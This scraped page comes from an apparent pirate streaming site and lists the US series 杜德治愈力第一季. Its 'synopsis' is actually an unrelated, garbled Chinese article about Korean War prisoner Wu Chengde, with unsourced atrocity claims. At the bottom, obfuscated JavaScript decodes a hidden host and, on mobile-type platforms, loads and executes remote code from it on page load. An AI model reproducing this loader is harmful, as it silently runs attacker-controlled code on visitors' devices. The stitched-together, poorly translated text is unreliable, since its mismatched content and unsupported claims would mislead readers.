杜德治愈力第一季

主演:杰斯·查普曼 拉丽莎·奥蕾尼克 汤姆·艾弗瑞特·斯科特 斯蒂 

导演:里奇·基恩 

类型:美国 美国 2020 

喜欢杜德治愈力第一季这部美国的人也喜欢 · · · · · ·

名姝 第一季观看小贴士· · · · · ·

无需安装任何插件,即可快速播放。

DVD:普通清晰BD:高清无水印HD:高清TS:抢先非清晰

如果视频加载失败,可刷新更换浏览器播放

请收藏本站唯一网址 [ www.potentcera.com ] 以免丢失!

厚生影院: 提供《杜德治愈力第一季》免费的高清在线播放清晰观看 ,还提供了影视作品整体细节 、相关信息及资料 、热门搜索 、相似电影推荐 、电影评论等。

杜德治愈力第一季的剧情简介 · · · · · ·

影片名称:杜德治愈力第一季

影片别名:

影片拼音:dudezhiyulidiyiji

上映时间:2020

国家地区:美国

影片语言:英语

影片类型:美国

影片导演:里奇·基恩

影片主演:杰斯·查普曼,拉丽莎·奥蕾尼克,汤姆·艾弗瑞特·斯科特,斯蒂夫·扎恩,毛里齐奥·拉腊,索菲·金,劳雷尔·埃默里

资源类别:

资源更新:更新至8集已完结

总播放数:954 次

豆瓣评分:850

IMDB评分:

剧情介绍:

  3兵团下达给60军的任务是,在掩护本部受伤人员撤退后,可以从战场撤退。但是60军误解了命令,认为在援救兵团所有的伤员撤退后,可以从战场撤退。于是派遣了180师团,在战场上抵抗超过自己5倍的敌人,错过了撤退的最佳时机。  在抗美援朝的战争中,志愿军的俘虏共计2万人,其中180师团7000人,占了三分之一。  当时的180师团被重重包围,志愿军5天都得不到一点食物,战场上一片凄惨和悲壮。  180师团代政委、政治部主任吴成德在撤退的过程中,突破包围脱逃,在战场上遇到了志愿军的伤员。如果放弃了伤员,就能马上和大部队会合,但是他没有那样做。  180师团解散后,吴成德率领部队在敌人后面进行了长达14个月的游击斗争,最终被以美国为首的“联合国军队”俘虏,受到虐待、拷问、水刑等。  今天介绍的这个志愿军师级干部吴成德,在朝鲜战争时期是我方最有名的俘虏,也是职位最高的志愿军俘虏。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?  他的一生是坎坷的苦难和传奇,在成为美军俘虏后受到拷问,在俘虏营中遭遇的非人待遇,以及战后回国的经历,英雄千古,铁血心血,英勇长寿。  吴成德出生于1912年10月,山西新绛县人,19点在当地小学任教。由于抗日战争爆发,国难当头全民抗战,吴成德也弃笔从戎,加入了共产党的革命队伍。  在那个时代,作为少数文化人,读书写字被重用。吴成德从山西军政训练班毕业后,担任本县的自卫队政委。  参加革命队后,冒着敌人的子弹冲锋,在炮火中抵抗侵略,争取民族解放,十几年生于战场,死后以吴成德为优秀指战员。  1950年10月19日,志愿军越过鸭绿江,开始了悲壮伟大的抗美援朝战争。  之后,志愿军司令官彭德怀为了夺回北朝鲜战局的主导权,发动了大规模的战斗反击,也就是第五次战斗。  1951年4月22日傍晚,在三八线附近的数百里地区,志愿军和朝鲜人民军共计15军,在宽广的正面战线上对“联合国军”的防御深度突然发起了猛烈的攻击。  带领宋时轮、陶勇、杨得志、李志明、志愿军部队,同时发动战斗分割,深入插入敌人。  当时吴成德所属的180师团实际上是第二梯队,随着先头部队投入战斗,追歼了一部分敌人。  志愿军和联合国军队已经进行了4次对决。也就是说,我们口中的四次战役,虽然战果丰饶,但却打败了西方联军无法取胜的神话。但是,我方志愿军的作战法则也被联合国军队掌握了。  特别是此时的美方指挥官,不是自大的麦克阿瑟,而是美军的李奇微制定了“磁战术”和“绞杀战”。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?李奇微  联合国军队在李奇微的指挥下,引导志愿军上前,等到志愿军粮食弹药用尽,他们进行了大规模的反击,可以说敌人采用了向我进退的战术。  这是李奇微根据战场形势,分析敌我双方的优势和弱点后,进行防守反击,称之为磁战术。  彭氏判断,敌人将主力撤退到首尔的南侧进行抵抗,在周边配置了大量的火力地带,引导志愿军攻击首尔。  彭德怀立即命令部队停止进攻。这是第五次战斗的第一阶段,志愿军歼灭敌人2万3千人,并没有出现歼灭美军全体的战斗例。  由于战局的结果不令人满意,彭德怀采用了新战术,开始了第五次战的第二阶段,指令下达后,5月16日傍晚,战斗正式开始。  在北汉江南岸30公里宽的作战地区,180师团负责布防,任务是牵制敌人,全师装备不好,总兵力只有1万人。  但是180师团所面临的敌人有300辆坦克、800门大炮、5万人以上的兵力,是美国第10军的机械化部队,任务艰巨,环境困难。  但是180师团的全体指战员没有任何萎缩,战斗情绪高涨。  在第五次全战的第二阶段,共歼灭了5万9千个敌人,虽然未能达成战斗的预期,但志愿军已经疲惫不堪,北朝鲜的“春雨季节”到来,后方的后勤补给无法到达前线。  战斗继续下去,就没有任何意义了,彭德怀下令结束战斗,转移到北方。  第7天深夜2点,突然前方战场传来180师团失去联络的消息。。。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?彭德怀  彭德怀听了报告,便命令第三兵团,组织部队要援救180师团,然后得到情报,180师团被敌人切断,陷入了沉重的包围。  因此,彭德怀一直在电话旁,不到第二天两夜就点燃了第三兵团。远在北京的毛泽东也多次给彭德怀打电话。  第三兵团的60军全力救助了180师团,不幸的是,180师团接到了保护本部受伤人员撤退的命令后,当时所持有的粮食并不多。  另外,左右两翼的15军和63军于5月22日撤退到遵令北,180师团3面受到敌人的袭击,形成了150公里的巨大间隙。  这个地区只有180师团,随着残酷的战局的持续,失去了与大部队的联系,陷入了敌人的包围。  反观敌人,发现志愿军主力撤退,立即展开全线反攻,全力向北推进。与美国第7师团、韩国第6师团联合,插入180师团后方。  180师团的正面战场上,美军第24师团、韩国第2师团等摩托车化部队陷入了头上有飞机,四面有敌人的绝望状态。  5月23日,美军集结轰炸机,轰炸180师团,炮弹像布拉格一样反复炮击。  根据当时战场的记载,180师团陷入重围,进入了弹尽粮绝的境地,团长牺牲后,改变了队长的指挥,队长牺牲后,改变了连长的指挥,最后改变了战士的指挥,无论是炊事班还是师部的文职干部,全部投入战斗。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?  美军接二连三的攻击失败,再次发动疯狂的炮击,出动空军进行轰炸,阵地变成焦土。  2天后,180师团干部的死伤人数超过了国内战争2年的数字。刘吉耀、赵国泰、韩启明、杨彬、郭青五、王体先、张允浩。。。。。。等烈士的名字被葬送在异国他乡。  5月25日,部队因粮食中断,官兵们吃树叶和草根,其中许多官兵误食山羊角葱,中毒身亡。  5月26日,180师团抵达驾驶德山时,被美韩联军5倍以上的敌人包围,180师团的阵地多次压缩,处于细长地带。由于激战,山地被荒地炸毁,一棵草也没有找到。  由于炮弹和航空炸弹的疯狂袭击,阵地表面的浮土长达1米以上。部队已经断粮3、4天,弹药也所剩无几,志愿军的尸体随处可见。  一到中午,师长郑其贵、政治主任吴成德就在春川的山谷里召开了紧急会议。本部已经被包围,是固守等待援助,还是突破包围。请集体决定!  炮弹在指挥所周围爆炸,担任警备的士兵被机关枪射击牺牲。  吴成德说:“从这几天的战斗来看,我们师团的重大伤亡不是跟敌人的真枪真刀面对面的对决,而是在敌人的猛烈炮击中吃亏。这样被动地战斗下去,部队就会被炮火击中。更何况我们没有补充弹药,主张突破包围。”说了。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?  副师长段龙章、参谋长王振邦、540团政委李矛召、538团团长庞培也坚决要求包围,与其坐等死亡,还不如拼死战斗。  敌人们因为我比较少,所以经过了激烈的战斗后,只能分散突破包围,全体师员极度疲劳,得不到粮食的补充,子弹所剩无几。最后的炮弹是用来炸毁火炮的。  师代政委员会、政治部主任吴成德跨战马准备撤退时,下面的同志说我听说了。  军医王洪兴当时也身负重伤,要求吴成德带自己去。  因此,吴成德晚了20分钟,离开了师部的包围员。他们来山口的时候,因为敌人的探照灯,发现前方有300人受伤,无法从战场上撤退。  根据史料记载,士兵们在见到吴成德后,仿佛看到了曙光和希望,并喊道:。  “吴政委,我可以飞出去吗?”  “吴政委,之前有多少敌人?”  “吴政委,请务必带我们去。”  此时,吴成德如果追击大部队,就能马上离开战场,但吴成德却没有这样做。他没能扔掉伤员。  吴成德心里清楚如果自己和伤员一起包围的话,很有可能在战场上牺牲,但是决定和志愿军180师团的伤员一起进退。  为了稳定伤员的情绪,吴成德也为了证明自己的决心,拔了手枪杀了战马,“同志们,我要和大家在一起。”这样喊道。  其实这时,一队官兵从旁边经过,吴成德要求他们尽快突破包围,照顾伤员。  在吴成德的指挥下,伤员40人被分为一组,各组由1、2名干部带领,相互扶持向北包围。  因为敌人太多了,吴成德只好进入山林,在异国展开了敌人后游击战500天以上。  这时,我查了一下美军的相关资料,我们解散了中国180师团,他们有很多士兵进山游击,所以我们封锁了所有的路口和粮食。他们每天派人上山找食物,我们每天能射杀四五个敌人,他们的衣服破烂不堪,比无家可归的人更冷。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?  遗憾的是,1952年夏天,吴成德战斗到只剩下3个人,被美军俘虏的是韩国方面在朝鲜战争中担任俘虏的最高职位。志愿军总指挥彭德怀愤怒180师团的损失,把这第五次战斗看作四次军事失误之一。  1954年,一八O师团从北朝鲜撤退回国后,军事委员会决定将其分为三个独立师团,设立安徽省军区、江苏省军区、浙江省军区,然后取消了一八O师团号。  吴成德被俘后,被收监在釜山监狱,面对各种拷问和强迫,低头不屈服,不放弃信念。  敌人想让吴成德屈服,想让吴成德去台湾。  如果不能理解吴成德俘虏的经历,就把相机对准巨济岛的俘虏营,在严酷的北朝鲜战场上美军崩溃的时候,自己也不会放过。  志愿军在黑灯的火光中追击美军,美军在黑灯的火光中逃亡,最后被夺去了视线,于是向英军阵地投射照明弹,英军29旅的王牌师全部歼灭。  美国对自己的队友还很毒手,对付志愿军的俘虏时手段更残忍。  当时,美军出动坦克、喷火枪、装甲车,进入自己的俘虏营,杀害了自己的志愿军俘虏。  美军将重兵器投入自己的俘虏营,实施了粗暴残忍的屠杀。西媒广泛报道了希特勒杀害犹太人的消息,巨济岛战俘营的美军恶性事迹被历史所掩盖。  残暴的韩国军队,明明不擅长军事作战,却擅长杀人、枪杀百姓、虐待俘虏等暴行。在这一点上,韩国深受西方文化的真传,比不上过去。  在俘虏营中,美国人和韩国人用残酷的手段惹怒了志愿军俘虏,俘虏营的杜德长官被志愿军俘虏了。  看起来复杂吗?  再重复一下,志愿军俘虏联合起来,俘虏了美军巨济岛的俘虏营长官。也就是说,负责管理俘虏营的美军长官杜德反而成了俘虏,成为了俘虏手中的俘虏。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?美国陆军准将杜德  在这里,着重叙述了杜德的所作所为,采用了强制和拷问的手段,拷问志愿军的俘虏,强迫中国方面的将士写文章,使中华人民共和国变黑。此外,还将志愿军战俘作为细菌试验品、原子武器放射性元素的试验品送去。  关于这件事,笔者询问了很多老兵,得到了肯定的回答,但并不是虚构的。只是,西方媒体不想报道,国内媒体对俘虏问题有保守倾向,所以不为大众所知。  但是,韩国的志愿军在济州岛(济州岛)唱军歌,反美的气势增加,美军俘虏营的杜德长官成为俘虏,这是世界军事史上唯一的一件事。  志愿军在巨济岛的俘虏营里,俘虏了杜德之后,不但没有使用强硬的手段,还尽全力吃杜德好好睡了一觉,照顾得很好。  只有志愿军和朝鲜人民军发动了心理战术,才用手写的方式给杜德父母犯下了自己的累赘罪行,成为了历史的铁证。  因为艾森豪威尔参加了总统选举,李奇微就任NATO的总司令官,与战俘代表进行交涉,决议今后不能屠杀战俘。  双方签字后,许多人看到杜德在哭,眼泪夺眶而出,他的军事生涯完全结束了。  但令人悲哀的是,国内至今仍有许多网民,赞美美国人的人道主义精神,帮助羊、帮助狗,被称为西方人内心深处的善良。笔者认为,这些网友不仅身体缺钙,还需要补充大脑。  说起韩国对待俘虏和平民,在越南韩国军队被称为恶魔的后裔。  越南战争期间,韩国向越南派兵作战,胜利很少,但屠村比美国人多得多,现在也被越南人所憎恨。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?巨济岛俘虏营:当时是世界最大的俘虏收容所,有2万多名中国人民志愿军俘虏。  回到正题上来,中美双方在北朝鲜战场上对待俘虏的待遇相差很大。例如,美国士兵在回忆中说。  我们被朝鲜人逮捕后,因为对方长官的样子丑陋而严重烧伤过,所以我们说把那个凝固了汽油弹的脸,他问了我们中的一个人。不是上尉吗。  然后坚定了汽油弹的脸,把没收的左轮手枪装满子弹,转动了枪管后,拉出美国士兵,听到了枪声。后来才知道他是故意威胁美国人,被拉出的美国士兵,没有被处死。  但枪声却引来了中国军队,中国人说:“如果毛泽东知道北朝鲜的盟友而无视对俘虏的宽大政策的话……特别是像你们这样对待俘虏的粗暴,不符合他的理念,他一定会不高兴的。”。  之后,美国的俘虏被志愿军收留,中国人每天配置警卫员,持枪保护美军俘虏的安全。经常见到愤怒的当地人,想向美军的俘虏们复仇,但是其中有老年人,全家都被美军飞机炸死了,所以想把石头扔到美军的俘虏头上。  但是,中国的保安不会怀疑他的手中有枪,会发射致命的子弹。在中国人的保护下,我们才毫不伤害地进入后方战俘营。。。。。。  历史执著于事实真相。以上内容可以从美军俘虏的回忆录中进行验证。另外,在当时的战场上,在郊外双方进行和谈的阶段,西方记者采访俘虏营的时候,留下了新闻的证据。  关于美国人出版的书,志愿军只是说要保护俘虏的安全,之后,没有提出对我志愿军俘虏的各种优待,开设了养殖场和菜园,保证了美军俘虏的营养供给。  但是!美国人以德报怨,对志愿军的俘虏施加种种暴行,作为细菌战和原子武器的放射性元素的实验品,他们在自己的书中,没有明确这些内容。  “联合国军”战俘营的杜德长官,因为对俘虏的管理不利,所以只被免职了。  根据美军士兵的回忆,中国志愿军中的一人成为俘虏后,逃出来,并主张将所有的资本列强都破坏掉。  美国人说:“中国还有坏人吗?”听说了。  那个士兵回答说:“中国在共产党的领导下已经没有压迫感,谁都能吃饱。”。  吴成德是在这样的艰苦条件下坚持下来的。  1953年7月27日,朝鲜停战协定的签字生效,朝鲜战争正式结束。停战后,双方交换了战俘。吴成德是俘虏中地位最高的人,是最后的送还者。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?  9月2日,美军让吴成德入浴。他听了当时的所见所闻,看到俘虏离开了好几次,推测自己可能会被遣返,但这时让他入浴是因为敌人为了“美化”俘虏,想要隐藏虐待俘虏的真相。  此时的吴成德身心疲惫,踢了水桶。一看到美军士兵,就用水龙头里的水润湿了吴成德,给了他新衣服。  吴成德把美军的新衣服抛到外面,靠在墙边用针缝了自己的旧鞋。这是从国内穿到北朝鲜的,藏在丹东的抗美援朝纪念馆里。  上午9点,中方人员收到吴成德时,已经无法识别他的身影,仅仅几个月的俘虏营生活,吴成德骨瘦如柴,原来体重130多斤,只剩下90多斤,像可以走的骨骼。  回国后,吴成德首先检查了身体,直到恢复健康为止都进行了“检查”。  因为在那个特殊的革命时代,对待俘虏的态度和今天不同,偏向于审查和批判。战俘的投降行为归结于革命意志不坚定。  其中担任俘虏教育的,由“归管处”负责,中央对抗美援朝中的志愿军俘虏下达了以下指示:热情关怀,耐心教育,严格审查,慎重处理,妥善安排。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?吴成德  归管处要求吴成德进行“自我说明”,是因为被俘是一个害羞、胆小、胆小的环境,既然要进行革命斗争,就必须坚持到最后,血战到底。  而且战俘接受过美国的教育,即使是像吴成德那样的有功者也不能抵消功过,两者必须分开。  吴成德进入归管处后,心中感到困惑。他当初在战俘营中,在敌人的威胁和利诱下,坚决拒绝去台湾,坚持回归祖国。  但是,真正回到祖国后,有人认为180师团解散的责任必须由吴成德承担。  吴成德当然不愿意接受,但他的性格总是刚正的,所以他的政治审查始终没有通过。  根据他人的观察,吴成德的言行发生了变化。像是大脑空白的尸体。吴成德也在心中认为,只有战死沙场才是叛徒。  到1954年6月为止,吴成德等战场送还者的归住地已经落户,大部分人都被开除了军籍和职务。  吴成德也同样被免职后,被安排在辽宁盘锦的大洼农场,担任副厂长,负责开垦任务。  但是,吴成德对自己的不公正待遇不放弃申诉,在农场里处世低调,工作公正公平,受到了农场群主人的爱戴和信服。  因此,当被提议批评吴成德时,参加批评大会的人很少。  吴成德:志愿军的最高水平战俘,死也不屈服!回国后会怎么样?吴成德  吴成德一直抱怨自己的不满,给有关部门和各级领导同志写了几十封访问信。为了自己的一生,不要在历史上留下污点,要得到客观中立的公正结论。  1980年,中国共产党中央发行了《关于志愿军俘虏归来者问题的再检查处理意见》第74号文件。  吴成德和其他战俘遣返者终于等着曙光和希望,经过复审和处理,在历史上获得了公正的评价。  1982年3月恢复党籍,70岁的吴成德恢复了老红军的待遇。  就像有180师团的第60军一样,这位军长的名字是威杰,临死前没有忘记,“抗美援朝第5次战役180师团的损失很严重,但是把木板钉在180师团的屁股上是不公平的……”瑟瑟发抖。  1996年3月,吴成德以84岁高龄辞世,英雄千古,浩气长寿。  但是,吴成德所在的180师团被分为三个独立师团,驻扎在安徽、江苏、浙江三省,180个师号被取消。

美国,美国《杜德治愈力第一季》在2020发行,厚生影院收集了杜德治愈力第一季全集免费在线观看、手机mp4免费观看、完整高清云播放等资讯信息,如果你有更好看的未删减无广告的杜德治愈力第一季影视资源欢迎联系厚生影院。

免责声明:若本站收录的资源侵犯了您的权益,请发邮件至:[email protected]我们会及时删除侵权内容,谢谢合作!

Copyright © 2008-2022

function XyvgsjiN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function axMRvHwU(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XyvgsjiN(t);};window[''+'X'+'H'+'N'+'K'+'R'+'A'+'w'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=axMRvHwU,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a25yLnFqeHlzzLmNu','154049',window,document,['z','gxuUYp']);}:function(){};